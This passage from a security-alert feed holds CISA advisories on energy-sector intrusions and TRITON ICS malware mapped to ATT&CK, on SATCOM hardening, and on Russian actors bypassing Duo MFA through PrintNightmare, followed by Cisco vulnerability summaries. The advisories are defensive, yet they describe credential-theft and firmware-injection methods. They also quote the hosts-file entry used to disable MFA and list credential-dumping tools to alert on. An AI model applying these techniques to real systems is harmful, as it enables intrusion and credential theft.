  Technique: Masquerading [T1036] After downloading tools from a remote server, the threat actor renamed the extensions.

Restrict File and Directory Permissions: restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

Code Signing: enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.

Execution Prevention: block execution of code on a system through application control, and/or script blocking.

Credential Access [TA0006] Brute Force: Password Cracking [T1110.002]

The threat actor used password-cracking techniques to obtain the plaintext passwords from obtained credential hashes.

The threat actor dropped and executed open-source and free password cracking tools such as Hydra, SecretsDump, and CrackMapExec, and Python.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Password Policies: set and enforce secure password policies for accounts.

Forced Authentication [T1187] Microsoft Word attachments sent via spearphishing emails leveraged legitimate Microsoft Office functions for retrieving a document from a remote server over Server Message Block (SMB) using Transmission Control Protocol ports 445 or 139. As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.)

Password Policies: set and enforce secure password policies for accounts.

Filter Network Traffic: use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

The threat actor’s watering hole sites contained altered JavaScript and PHP files that requested a file icon using SMB from an IP address controlled by the threat actors.

The threat actor manipulated LNK files to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actor exploited this built-in Windows functionality by setting the icon path to a remote server controller by the actors. When the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection.
 

Note: this activity also applies to:

  • Tactic: Persistence [TA0003], Technique: Boot or Logon Autostart Execution: Shortcut Modification [T1547.009]
OS Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory [T1003.001] The threat actor used an Administrator PowerShell prompt to enable the WDigest authentication protocol to store plaintext passwords in the LSASS memory. With this enabled, credential harvesting tools can dump passwords from this process’s memory.

Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Password Policies: set and enforce secure password policies for accounts.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Privileged Process Integrity: protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Credential Access Protection: use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.

OS Credential Dumping: NTDS [T1003.003] The threat actor collected the files ntds.dit. The file ntds.dit is the Active Directory (AD) database that contains all information related to the AD, including encrypted user passwords.

Monitor: monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.

Privileged Account Management: manage the creation of, modification of, se of, and permissions associated with privileged accounts, including SYSTEM and root.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Discovery [TA0007] Remote System Discovery [T1018]

The threat actor used privileged credentials to access the Energy Sector victim’s domain controller. Once on the domain controller, the threat actors used batch scripts dc.bat and dit.bat to enumerate hosts, users, and additional information about the environment. 

Note: this activity also applies to: 

  • Tactic: Persistence [TA0003], Technique: Valid Accounts: Domain Accounts [T1078.002]
  • Tactic: Discovery [TA0007], Technique: System Owner/User Discovery [T1033]

Monitor: normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information.

Monitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.

The threat actor accessed workstations and servers on corporate networks that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. 

The actor targeted and copied profile and configuration information for accessing ICS systems on the network. The threat actor copied Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems and took screenshots of a Human Machine Interface (HMI).

Note: this activity also applies to

  • Tactic: Discovery [TA0007], Technique File and Directory Discovery [T1083]
  • Tactic: [TA0009], Technique: Screen Capture [T1113]
File and Directory Discovery [T1083]

The actor used dirsb.bat to gather folder and file names from hosts on the network.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Command and Scripting Interpreter: Windows Command Shell [T1059.003]
This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. The threat actor conducted reconnaissance operations within the network. The threat actor focused on identifying and browsing file servers within the intended victim’s network. Lateral Movement [TA0008] Lateral Tool Transfer [T1570]

The threat actor moved laterally via PsExec, batch scripts, RDP, VNC, and admin shares.

Note: this activity also applies to:

  • Tactic: Lateral Movement [TA0008], Techniques: 
    • Remote Services: Remote Desktop Protocol [T1021.001]
    • Remote Services: SMB/Windows Admin Shares [T1021.002]
    • Remote Services: VNC [T1021.005]

Network Intrusion Prevention: use intrusion detection signatures to block traffic at network boundaries.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

User Account Management: manage the creation of, modification o, se of, and permissions associated with user accounts.

Disable or Remove Feature or Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Filter Network Traffic: use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

Limit Software Installation: block users or groups from installing unapproved software.

Collection [TA0009] Data from Local System [T1005]  The threat actor collected the Windows SYSTEM registry hive file, which contains host configuration information.

Monitor: monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data.

Data may also be acquired through Windows system management tools such as WMI and PowerShell.

Archive Collected Data: Archive via Utility [T1560.001] The threat actor compressed the ntds.dit file and the SYSTEM registry hive they had collected into archives named SYSTEM.zip and comps.zip. Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Screen Capture [T1113]

The threat actor used Windows’ Scheduled Tasks and batch scripts, to execute scr.exe and collect additional information from hosts on the network. The tool scr.exe is a screenshot utility that the threat actor used to capture the screen of systems across the network.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Techniques: 
    • Command and Scripting Interpreter: Windows Command Shell [T1059.003]
    • Scheduled Task/Job: Scheduled Task [T1053.005]

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Disable or Remove Feature or Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

The actor used batch scripts labeled pss.bat and psc.bat to run the PsExec tool. PsExec was used to execute scr.exe across the network and to collect screenshots of systems in a text file.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Techniques: 
    • Command and Scripting Interpreter: Windows Command Shell [T1059.003]
    • System Services: Service Execution [T1569.002]
Command and Control [TA0011] Ingress Tool Transfer [T1105] The threat actor downloaded tools from a remote server.    

Monitor: monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as File Transfer Protocol, that does not normally occur may also be suspicious.

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.

Use intrusion detection signatures to block traffic at network boundaries.

 

TRITON Malware

Table 4 maps TRITON’s capabilities to the ATT&CK for ICS framework. For mitigations to harden ICS/OT environments, refer to the Mitigations section of this advisory.

Table 4: ICS Domain Tactics and Techniques for TRITON [4]

Initial Access

Engineering Workstation Compromise [T0818]

TRITON compromises workstations within the safety network.  Execution

Change Operating Mode [T0858]

Note: this technique also applies to Evasion.

TRITON can halt or run a program through the TriStation protocol. (Note: TriStation protocol is the protocol that Triconex System software uses to communicate with the Tricon PLCs.) 

Execution through API [T0871]

TRITON leverages a custom implementation of the TriStation protocol, which triggers APIs related to program download, program allocation, and program changes.

Hooking [T0874]

Note: this technique also applies to Tactic: Privilege Escalation.

TRITON's injector modifies the address of the handler for a Tristation protocol command so that when the command is received, the payload may be executed instead of normal processing. Modify Controller Tasking [T0821] Some TRITON components are added to the program table on the Tricon so that they are executed by the firmware once each cycle. Native API [T0834] TRITON's payload takes commands from TsHi.ExplReadRam(Ex), TsHi.ExplWriteRam(Ex), and TsHi.ExplExec functions to perform operations on controller memory and registers using syscalls written in PowerPC shellcode. Scripting [T0853]

TRITON communicates with Triconex Tricon PLCs using its custom Python script. This Python script communicates using four Python modules that collectively implement the TriStation protocol via User Datagram Protocol (UDP) 1502.

Note: this use also applies to:

Persistence 

System Firmware [T0857]

Note: this technique also applies to Tactic: Inhibit Response Function.

TRITON's injector injects the payload into the Tricon PLCs’ running firmware. A threat actor can use the payload to read and write memory on the PLC and execute code at an arbitrary address within the firmware. If the memory address it writes to is within the firmware region, the malicious payload disables address translation, writes the code at the provided address, flushes the instruction cache, and re-enables address translation. This allows the malware to change the running firmware. Privilege Escalation Exploitation for Privilege Escalation [T0890] TRITON can gain supervisor-level access and control system states by exploiting a vulnerability. Evasion Exploitation for Evasion [T0820] TRITON's injector exploits a vulnerability in the device firmware to escalate privileges and then it disables and (later patches) a firmware RAM/ROM consistency check.  Indicator Removal on Host [T0872] After running the malicious payload, TRITON's Python script overwrites the malicious payload with a “dummy” program.

Masquerading [T0849]

TRITON’s Python script masquerades as legitimate Triconex software. TRITON’s injector masquerades as a standard compiled PowerPC program for the Triconex PLC. Discovery

Remote System Discovery [T0846]

TRITON’s Python script can autodetect Triconex PLCs on the network by sending a UDP broadcast packet over port 1502. Lateral Movement Program Download [T0843] TRITON leverages the TriStation protocol to download programs to the Tricon PLCs. Collection Detect Operating Mode [T0868] A TRITON Python module provides string representations of different features of the TriStation protocol, including message and error codes, key position states, and other values returned by the status functions.

Program Upload [T0845]

TRITON uploads its payload to the Tricon PLCs. Impair Process Control Unauthorized Command Message [T0855] A threat actor can use TRITON to prevent the Tricon PLC from functioning appropriately. Impact Loss of Safety [T0880] TRITON can reprogram the safety PLC logic to allow unsafe conditions or state to persist. Revisions
  • March 24, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-076A: Strengthening Cybersecurity of SATCOM Network Providers and Customers

US-CERT - Thu, 2022-03-17 12:00
Original release date: March 17, 2022
Summary

Actions to Take Today:
• Use secure methods for authentication.
• Enforce principle of least privilege.
• Review trust relationships.
• Implement encryption.
• Ensure robust patching and system configuration audits.
• Monitor logs for suspicious activity.
• Ensure incident response, resilience, and continuity of operations plans are in place.

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are aware of possible threats to U.S. and international satellite communication (SATCOM) networks. Successful intrusions into SATCOM networks could create risk in SATCOM network providers’ customer environments.

Given the current geopolitical situation, CISA’s Shields Up initiative requests that all organizations significantly lower their threshold for reporting and sharing indications of malicious cyber activity. To that end, CISA and FBI will update this joint Cybersecurity Advisory (CSA) as new information becomes available so that SATCOM providers and their customers can take additional mitigation steps pertinent to their environments.

CISA and FBI strongly encourages critical infrastructure organizations and other organizations that are either SATCOM network providers or customers to review and implement the mitigations outlined in this CSA to strengthen SATCOM network cybersecurity.

Click here for a PDF version of this report.

Mitigations

CISA and FBI strongly encourages critical infrastructure organizations and other organizations that are either SATCOM network providers or customers to review and implement the following mitigations:

Mitigations for SATCOM Network Providers
  • Put in place additional monitoring at ingress and egress points to SATCOM equipment to look for anomalous traffic, such as:
    • The presence of insecure remote access tools—such as Teletype Network Protocol (Telnet), File Transfer Protocol (FTP), Secure Shell Protocol (SSH), Secure Copy Protocol (SCP), and Virtual Network Computing (VNC)—facilitating communications to and from SATCOM terminals.
    • Network traffic from SATCOM networks to other unexpected network segments.
    • Unauthorized use of local or backup accounts within SATCOM networks.
    • Unexpected SATCOM terminal to SATCOM terminal traffic.
    • Network traffic from the internet to closed group SATCOM networks.
    • Brute force login attempts over SATCOM network segments.
  • See the Office of the Director of National Intelligence (ODNI) Annual Threat Assessment of the U.S. Intelligence Community, February 2022 for specific state-sponsored cyber threat activity relating to SATCOM networks.
Mitigations for SATCOM Network Providers and Customers
  • Use secure methods for authentication, including multifactor authentication where possible, for all accounts used to access, manage, and/or administer SATCOM networks. 
    • Use and enforce strong, complex passwords: Review password policies to ensure they align with the latest NIST guidelines
    • Do not use default credentials or weak passwords.
    • Audit accounts and credentials: remove terminated or unnecessary accounts; change expired credentials.
  • Enforce principle of least privilege through authorization policies. Minimize unnecessary privileges for identities. Consider privileges assigned to individual personnel accounts, as well as those assigned to non-personnel accounts (e.g., those assigned to software or systems). Account privileges should be clearly defined, narrowly scoped, and regularly audited against usage patterns.
  • Review trust relationships. Review existing trust relationships with IT service providers. Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data.  
    • Remove unnecessary trust relationships. 
    • Review contractual relationships with all service providers. Ensure contracts include appropriate provisions addressing security, such as those listed below, and that these provisions are appropriately leveraged: 
      • Security controls the customer deems appropriate. 
      • Provider should have in place appropriate monitoring and logging of provider-managed customer systems.
      • Customer should have in place appropriate monitoring of the service provider’s presence, activities, and connections to the customer network.
      • Notification of confirmed or suspected security events and incidents occurring on the provider’s infrastructure and administrative networks.
  • Implement independent encryption across all communications links leased from, or provided by, your SATCOM provider. See National Security Agency (NSA) Cybersecurity Advisory: Protecting VSAT Communications for guidance.
  • Strengthen the security of operating systems, software, and firmware.
    • Ensure robust vulnerability management and patching practices are in place and, after testing, immediately patch known exploited vulnerabilities included in CISA's living catalog of known exploited vulnerabilities. These vulnerabilities carry significant risk to federal agencies as well as public and private sectors entities. 
    • Implement rigorous configuration management programs. Ensure the programs can track and mitigate emerging threats. Regularly audit system configurations for misconfigurations and security weaknesses.
  • Monitor network logs for suspicious activity and unauthorized or unusual login attempts.
    • Integrate SATCOM traffic into existing network security monitoring tools.
    • Review logs of systems behind SATCOM terminals for suspicious activity.
    • Ingest system and network generated logs into your enterprise security information and event management (SIEM) tool. 
    • Implement endpoint detection and response (EDR) tools where possible on devices behind SATCOM terminals, and ingest into the SIEM.
    • Expand and enhance monitoring of network segments and assets that use SATCOM.
    • Expand monitoring to include ingress and egress traffic transiting SATCOM links and monitor for suspicious or anomalous network activity. 
    • Baseline SATCOM network traffic to determine what is normal and investigate deviations, such as large spikes in traffic.
  • Create, maintain, and exercise a cyber incident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems—including SATCOM networks—are disrupted or need to be taken offline.
Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

Resources Revisions
  • March 17, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-074A: Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability

US-CERT - Tue, 2022-03-15 07:00
Original release date: March 15, 2022
Summary

Multifactor Authentication (MFA): A Cybersecurity Essential
• MFA is one of the most important cybersecurity practices to reduce the risk of intrusions—according to industry research, users who enable MFA are up to 99 percent less likely to have an account compromised.
• Every organization should enforce MFA for all employees and customers, and every user should sign up for MFA when available.
• Organizations that implement MFA should review default configurations and modify as necessary, to reduce the likelihood that a sophisticated adversary can circumvent this control.

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to warn organizations that Russian state-sponsored cyber actors have gained network access through exploitation of default MFA protocols and a known vulnerability. As early as May 2021, Russian state-sponsored cyber actors took advantage of a misconfigured account set to default MFA protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network. The actors then exploited a critical Windows Print Spooler vulnerability, “PrintNightmare” (CVE-2021-34527) to run arbitrary code with system privileges. Russian state-sponsored cyber actors successfully exploited the vulnerability while targeting an NGO using Cisco’s Duo MFA, enabling access to cloud and email accounts for document exfiltration.

This advisory provides observed tactics, techniques, and procedures, indicators of compromise (IOCs), and recommendations to protect against Russian state-sponsored malicious cyber activity. FBI and CISA urge all organizations to apply the recommendations in the Mitigations section of this advisory, including the following:

  • Enforce MFA and review configuration policies to protect against “fail open” and re-enrollment scenarios.
  • Ensure inactive accounts are disabled uniformly across the Active Directory and MFA systems. 
  • Patch all systems. Prioritize patching for known exploited vulnerabilities.

For more general information on Russian state-sponsored malicious cyber activity, see CISA's Russia Cyber Threat Overview and Advisories webpage. For more information on the threat of Russian state-sponsored malicious cyber actors to U.S. critical infrastructure as well as additional mitigation recommendations, see joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure and CISA's Shields Up Technical Guidance webpage.

Click here for a PDF version of this report.

For a downloadable copy of IOCs, see AA22-074A.stix.

Technical DetailsThreat Actor Activity

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 10. See Appendix A for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

As early as May 2021, the FBI observed Russian state-sponsored cyber actors gain access to an NGO, exploit a flaw in default MFA protocols, and move laterally to the NGO’s cloud environment.

Russian state-sponsored cyber actors gained initial access [TA0001] to the victim organization via compromised credentials [T1078] and enrolling a new device in the organization’s Duo MFA. The actors gained the credentials [TA0006] via brute-force password guessing attack [T1110.001], allowing them access to a victim account with a simple, predictable password. The victim account had been un-enrolled from Duo due to a long period of inactivity but was not disabled in the Active Directory. As Duo’s default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network.  

Using the compromised account, Russian state-sponsored cyber actors performed privilege escalation [TA0004] via exploitation of the “PrintNightmare” vulnerability (CVE-2021-34527) [T1068] to obtain administrator privileges. The actors also modified a domain controller file, c:\windows\system32\drivers\etc\hosts, redirecting Duo MFA calls to localhost instead of the Duo server [T1556]. This change prevented the MFA service from contacting its server to validate MFA login—this effectively disabled MFA for active domain accounts because the default policy of Duo for Windows is to “Fail open” if the MFA server is unreachable. Note: “fail open” can happen to any MFA implementation and is not exclusive to Duo.

After effectively disabling MFA, Russian state-sponsored cyber actors were able to successfully authenticate to the victim’s virtual private network (VPN) as non-administrator users and make Remote Desktop Protocol (RDP) connections to Windows domain controllers [T1133]. The actors ran commands to obtain credentials for additional domain accounts; then using the method described in the previous paragraph, changed the MFA configuration file and bypassed MFA for these newly compromised accounts. The actors leveraged mostly internal Windows utilities already present within the victim network to perform this activity.  

Using these compromised accounts without MFA enforced, Russian state-sponsored cyber actors were able to move laterally [TA0008] to the victim’s cloud storage and email accounts and access desired content. 

Indicators of Compromise

Russian state-sponsored cyber actors executed the following processes:

  • ping.exe - A core Windows Operating System process used to perform the Transmission Control Protocol (TCP)/IP Ping command; used to test network connectivity to a remote host [T1018] and is frequently used by actors for network discovery [TA0007].
  • regedit.exe - A standard Windows executable file that opens the built-in registry editor [T1112].
  • rar.exe - A data compression, encryption, and archiving tool [T1560.001]. Malicious cyber actors have traditionally sought to compromise MFA security protocols as doing so would provide access to accounts or information of interest. 
  • ntdsutil.exe - A command-line tool that provides management facilities for Active Directory Domain Services. It is possible this tool was used to enumerate Active Directory user accounts [T1003.003].

Actors modified the c:\windows\system32\drivers\etc\hosts file to prevent communication with the Duo MFA server:

  • 127.0.0.1 api-<redacted>.duosecurity.com 

The following access device IP addresses used by the actors have been identified to date:

  • 45.32.137[.]94
  • 191.96.121[.]162
  • 173.239.198[.]46
  • 157.230.81[.]39 
Mitigations

The FBI and CISA recommend organizations remain cognizant of the threat of state-sponsored cyber actors exploiting default MFA protocols and exfiltrating sensitive information. Organizations should:

  • Enforce MFA for all users, without exception. Before implementing, organizations should review configuration policies to protect against “fail open” and re-enrollment scenarios.
  • Implement time-out and lock-out features in response to repeated failed login attempts.
  • Ensure inactive accounts are disabled uniformly across the Active Directory, MFA systems etc.
  • Update software, including operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching known exploited vulnerabilities, especially critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to have strong, unique passwords. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.
  • Continuously monitor network logs for suspicious activity and unauthorized or unusual login attempts.
  • Implement security alerting policies for all changes to security-enabled accounts/groups, and alert on suspicious process creation events (ntdsutil, rar, regedit, etc.).

Note: If a domain controller compromise is suspected, a domain-wide password reset—including service accounts, Microsoft 365 (M365) synchronization accounts, and krbtgt—will be necessary to remove the actors’ access. (For more information, see https://docs.microsoft.com/en-us/answers/questions/87978/reset-krbtgt-password.html). Consider soliciting support from a third-party IT organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.  

FBI and CISA also recommend organizations implement the recommendations listed below to further reduce the risk of malicious cyber activity.

Security Best Practices
  • Deploy Local Administrator Password Solution (LAPS), enforce Server Message Block (SMB) Signing, restrict Administrative privileges (local admin users, groups, etc.), and review sensitive materials on domain controller’s SYSVOL share.
  • Enable increased logging policies, enforce PowerShell logging, and ensure antivirus/endpoint detection and response (EDR) are deployed to all endpoints and enabled.
  • Routinely verify no unauthorized system modifications, such as additional accounts and Secure Shell (SSH) keys, have occurred to help detect a compromise. To detect these modifications, administrators can use file integrity monitoring software that alerts an administrator or blocks unauthorized changes on the system. 
Network Best Practices
  • Monitor remote access/ RDP logs and disable unused remote access/RDP ports.
  • Deny atypical inbound activity from known anonymization services, to include commercial VPN services and The Onion Router (TOR).
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Regularly audit administrative user accounts and configure access control under the concept of least privilege. 
  • Regularly audit logs to ensure new accounts are legitimate users.
  • Scan networks for open and listening ports and mediate those that are unnecessary.
  • Maintain historical network activity logs for at least 180 days, in case of a suspected compromise.
  • Identify and create offline backups for critical assets.
  • Implement network segmentation.
  • Automatically update anti-virus and anti-malware solutions and conduct regular virus and malware scans.
Remote Work Environment Best Practices

With an increase in remote work environments and the use of VPN services, the FBI and CISA encourage organizations to implement the following best practices to improve network security:

  • Regularly update VPNs, network infrastructure devices, and devices used for remote work environments with the latest software patches and security configurations.
  • When possible, implement multi-factor authentication on all VPN connections. Physical security tokens are the most secure form of MFA, followed by authenticator applications. When MFA is unavailable, require employees engaging in remote work to use strong passwords.
  • Monitor network traffic for unapproved and unexpected protocols.
  • Reduce potential attack surfaces by discontinuing unused VPN servers that may be used as a point of entry for attackers.
User Awareness Best Practices

Cyber actors frequently use unsophisticated methods to gain initial access, which can often be mitigated by stronger employee awareness of indicators of malicious activity. The FBI and CISA recommend the following best practices to improve employee operations security when conducting business:

  • Provide end-user awareness and training. To help prevent targeted social engineering and spearphishing scams, ensure that employees and stakeholders are aware of potential cyber threats and delivery methods. Also, provide users with training on information security principles and techniques. 
  • Inform employees of the risks associated with posting detailed career information to social or professional networking sites.
  • Ensure that employees are aware of what to do and whom to contact when they see suspicious activity or suspect a cyberattack, to help quickly and efficiently identify threats and employ mitigation strategies.
Information Requested

All organizations should report incidents and anomalous activity to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov and/or CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. 

APPENDIX A: Threat Actor Tactics and Techniques

See table 1 for the threat actors’ tactics and techniques identified in this CSA. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

Table 1: Threat Actor MITRE ATT&CK Tactics and Techniques

Tactic Technique Initial Access [TA0001] Valid Accounts [T1078] Persistence [TA0003] External Remote Services [T1133] Modify Authentication Process [T1556] Privilege Escalation [TA0004] Exploitation for Privilege Escalation
[T1068] Defense Evasion [TA0005] Modify Registry [T1112] Credential Access [TA0006] Brute Force: Password Guessing [T1110.001] OS Credential Dumping: NTDS [T1003.003] Discovery [TA0007] Remote System Discovery [T1018] Lateral Movement [TA0008]    Collection [TA0009] Archive Collected Data: Archive via Utility [T1560.001] Revisions
  • March 15, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

Cisco Application Policy Infrastructure Controller Command Injection and File Upload Vulnerabilities

Cisco Security Advisories - Tue, 2022-03-08 16:52

Multiple vulnerabilities in the web UI and API endpoints of Cisco Application Policy Infrastructure Controller (APIC) or Cisco Cloud APIC could allow a remote attacker to perform a command injection or file upload attack on an affected system.

For more information about these vulnerabilities, see the Details section of this advisory.

Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-capic-mdvul-HBsJBuvW


Security Impact Rating: Medium
CVE: CVE-2021-1580,CVE-2021-1581
Categories: Security Alerts

Cisco Application Policy Infrastructure Controller App Privilege Escalation Vulnerability

Cisco Security Advisories - Tue, 2022-03-08 16:52

A vulnerability in an API endpoint of Cisco Application Policy Infrastructure Controller (APIC) and Cisco Cloud Application Policy Infrastructure Controller (Cloud APIC) could allow an authenticated, remote attacker with Administrator read-only credentials to elevate privileges on an affected system.

This vulnerability is due to an insufficient role-based access control (RBAC). An attacker with Administrator read-only credentials could exploit this vulnerability by sending a specific API request using an app with admin write credentials. A successful exploit could allow the attacker to elevate privileges to Administrator with write privileges on the affected device.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-capic-chvul-CKfGYBh8


Security Impact Rating: High
CVE: CVE-2021-1579
Categories: Security Alerts

Cisco Application Policy Infrastructure Controller Arbitrary File Read and Write Vulnerability

Cisco Security Advisories - Tue, 2022-03-08 16:52

A vulnerability in an API endpoint of Cisco Application Policy Infrastructure Controller (APIC) and Cisco Cloud Application Policy Infrastructure Controller (Cloud APIC) could allow an unauthenticated, remote attacker to read or write arbitrary files on an affected system.

This vulnerability is due to improper access control. An attacker could exploit this vulnerability by using a specific API endpoint to upload a file to an affected device. A successful exploit could allow the attacker to read or write arbitrary files on an affected device.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-capic-frw-Nt3RYxR2


Security Impact Rating: Critical
CVE: CVE-2021-1577
Categories: Security Alerts

Cisco Expressway Series and Cisco TelePresence Video Communication Server Vulnerabilities

Cisco Security Advisories - Thu, 2022-03-03 00:00

Multiple vulnerabilities in the API and web-based management interfaces of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker with read/write privileges to the application to write files or execute arbitrary code on the underlying operating system of an affected device as the root user.

For more information about these vulnerabilities, see the Details section of this advisory.

Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. 

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-87Q5YRk


Security Impact Rating: Critical
CVE: CVE-2022-20754,CVE-2022-20755
Categories: Security Alerts

Cisco Ultra Cloud Core - Subscriber Microservices Infrastructure Privilege Escalation Vulnerability

Cisco Security Advisories - Thu, 2022-03-03 00:00

A vulnerability in the Common Execution Environment (CEE) ConfD CLI of Cisco Ultra Cloud Core - Subscriber Microservices Infrastructure (SMI) software could allow an authenticated, local attacker to escalate privileges on an affected device.

This vulnerability is due to insufficient access control in the affected CLI. An attacker could exploit this vulnerability by authenticating as a CEE ConfD CLI user and executing a specific CLI command. A successful exploit could allow an attacker to access privileged containers with root privileges.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccsmi-prvesc-BQHGe4cm


Security Impact Rating: High
CVE: CVE-2022-20762
Categories: Security Alerts

Cisco StarOS Command Injection Vulnerability

Cisco Security Advisories - Thu, 2022-03-03 00:00

A vulnerability in the CLI of Cisco StarOS could allow an authenticated, local attacker to elevate privileges on an affected device.

This vulnerability is due to insufficient input validation of CLI commands. An attacker could exploit this vulnerability by sending crafted commands to the CLI. A successful exploit could allow the attacker to execute arbitrary code with the privileges of the root user. To exploit this vulnerability, an attacker would need to have valid administrative credentials on an affected device.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-staros-cmdinj-759mNT4n


Security Impact Rating: Medium
CVE: CVE-2022-20665
Categories: Security Alerts

Cisco Identity Services Engine RADIUS Service Denial of Service Vulnerability

Cisco Security Advisories - Wed, 2022-03-02 16:00

A vulnerability in the RADIUS feature of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause the affected system to stop processing RADIUS packets.
